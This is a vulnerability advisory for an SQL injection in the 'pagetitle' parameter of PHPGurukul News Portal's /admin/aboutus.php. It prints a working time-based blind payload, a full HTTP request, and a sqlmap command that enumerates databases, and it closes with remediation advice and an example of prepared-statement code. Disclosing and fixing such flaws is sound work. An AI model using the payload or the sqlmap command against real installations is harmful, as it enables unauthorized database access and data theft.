PHPGurukul News Portal Project V4.1 /admin/aboutus.php SQL injection
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
- A SQL injection vulnerability was identified in the "/admin/aboutus.php" file of the "News Portal" project. The root cause is that the value of the "pagetitle" parameter is used directly in a SQL query without proper sanitization or validation. As a result, attackers can craft input values that alter the structure of the SQL query and execute unauthorized operations against the database.
Impact
- Exploiting this SQL injection vulnerability allows attackers to gain unauthorized access to the database, cause sensitive data leakage, tamper with data, gain complete control over the system, and even disrupt services. This poses a severe threat to both the security of the system and the continuity of business operations.
DESCRIPTION
- During the security assessment of "News Portal", I detected a critical SQL injection vulnerability in the "/admin/aboutus.php" file. The vulnerability stems from insufficient validation of user input supplied in the "pagetitle" parameter, which allows attackers to inject SQL into the query executed by the page. Consequently, attackers can read the database without authorization, modify or delete data, and obtain sensitive information. Immediate corrective action is required to safeguard system security and preserve data integrity.
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability location:
Payload:
Parameter: pagetitle (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pagetitle=1' AND (SELECT 7186 FROM (SELECT(SLEEP(5)))RqtW) AND 'LrDS'='LrDS&pagedescription=<p><font color="#7b8898" face="Mercury SSm A, Mercury SSm B, Georgia, Times, Times New Roman, Microsoft YaHei New, Microsoft Yahei, %C3%A5%C2%BE%C2%AE%C3%A8%C2%BD%C2%AF%C3%A9%E2%80%BA%E2%80%A6%C3%A9%C2%BB%E2%80%98, %C3%A5%C2%AE%E2%80%B9%C3%A4%C2%BD%E2%80%9C, SimSun, STXihei, %C3%A5%C2%8D%C5%BD%C3%A6%E2%80%93%E2%80%A1%C3%A7%C2%BB%E2%80%A0%C3%A9%C2%BB%E2%80%98, serif"><span style="font-size: 26px;">1</span></font></p>&files=&update=
Vulnerability Request Packet
POST /News%20portal%20Project%20in%20PHP%20and%20MySQL/newsportal/admin/aboutus.php HTTP/1.1
Host: 172.20.10.4
Content-Length: 540
Cache-Control: max-age=0
Origin: http://172.20.10.4
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.20.10.4/News%20portal%20Project%20in%20PHP%20and%20MySQL/newsportal/admin/aboutus.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=1ac5499e93c6019ffff58a6495d0e6b5f0b2fab8%7Een; PHPSESSID=ijefj09htbmd77jpt89rtio9eo; _ctr=MTcyXzIwXzEwXzQuWlo%3D; nv4_cltz=480.480.480%257C%252F%257C; supports_rewrite=c298fda427532fdcb502f69ba7cb63d0; nv4_ctr=MTcyXzIwXzEwXzQuWlo%3D
Connection: keep-alive
pagetitle=1&pagedescription=%3Cp%3E%3Cfont+color%3D%22%237b8898%22+face%3D%22Mercury+SSm+A%2C+Mercury+SSm+B%2C+Georgia%2C+Times%2C+Times+New+Roman%2C+Microsoft+YaHei+New%2C+Microsoft+Yahei%2C+%C3%A5%C2%BE%C2%AE%C3%A8%C2%BD%C2%AF%C3%A9%E2%80%BA%E2%80%A6%C3%A9%C2%BB%E2%80%98%2C+%C3%A5%C2%AE%E2%80%B9%C3%A4%C2%BD%E2%80%9C%2C+SimSun%2C+STXihei%2C+%C3%A5%C2%8D%C5%BD%C3%A6%E2%80%93%E2%80%A1%C3%A7%C2%BB%E2%80%A0%C3%A9%C2%BB%E2%80%98%2C+serif%22%3E%3Cspan+style%3D%22font-size%3A+26px%3B%22%3E1%3C%2Fspan%3E%3C%2Ffont%3E%3C%2Fp%3E&files=&update=
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
sqlmap.py -r request.txt --dbs --dbms=mysql
(Screenshot taken after successful verification with sqlmap)
Suggested repair
- Employ prepared statements and parameter binding:
Prepared statements serve as an effective safeguard against SQL injection because they separate SQL code from user input data. When prepared statements are used, user-entered values are treated purely as data and cannot be interpreted as SQL code.
- Conduct input validation and filtering:
Rigorously validate and filter user input data to guarantee that it conforms to the expected format. This helps in blocking malicious input.
- Minimize database user permissions:
Ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day-to-day operations.
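The following is an added example of how the three repair suggestions can be applied to the "update" handler of a page like /admin/aboutus.php; it is not PHPGurukul's own code. The table name "tblpages", its column names, the "PageType" filter, the `$con` mysqli connection and the session key "alogin" are assumptions and must be adjusted to the real schema and login logic of the project.

```php
<?php
// Added example, not the project's code. Assumed schema: tblpages(PageType,
// PageTitle, PageDescription); assumed existing mysqli connection in $con.
session_start();
require_once 'includes/dbconnection.php'; // assumed: defines $con (mysqli)

// Vulnerable pattern this replaces (string concatenation, for contrast only):
//   $sql = "UPDATE tblpages SET PageTitle='" . $_POST['pagetitle'] . "' ...";

// The advisory notes the page is reachable without login: enforce the
// admin session before any database write (session key is assumed).
if (empty($_SESSION['alogin'])) {
    header('Location: index.php');
    exit;
}

function updateAboutPage(mysqli $con, string $pagetitle, string $pagedescription): bool
{
    // 1. Input validation: reject empty or over-long titles and control
    //    characters before the value reaches the database layer.
    $pagetitle = trim($pagetitle);
    if ($pagetitle === '' || mb_strlen($pagetitle) > 200
        || preg_match('/[\x00-\x1F\x7F]/', $pagetitle)) {
        return false;
    }

    // 2. Prepared statement: the SQL text is fixed; the user values are
    //    bound as parameters and can never change the query structure.
    $stmt = $con->prepare(
        'UPDATE tblpages SET PageTitle = ?, PageDescription = ? WHERE PageType = ?'
    );
    if ($stmt === false) {
        return false;
    }
    $type = 'aboutus';
    $stmt->bind_param('sss', $pagetitle, $pagedescription, $type);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// 3. Least privilege: connect with an account limited to the application
//    database, created once by an administrator, e.g.:
//    GRANT SELECT, INSERT, UPDATE, DELETE ON newsportal.* TO 'newsportal'@'localhost';

if (isset($_POST['update'])) {
    $ok = updateAboutPage($con, $_POST['pagetitle'] ?? '', $_POST['pagedescription'] ?? '');
    http_response_code($ok ? 200 : 400);
    echo $ok ? 'Page updated.' : 'Update rejected.';
}
```

With the statement prepared this way, the time-based payload from the POC is stored verbatim as the title text rather than evaluated, so the SLEEP() delay sqlmap relies on no longer occurs.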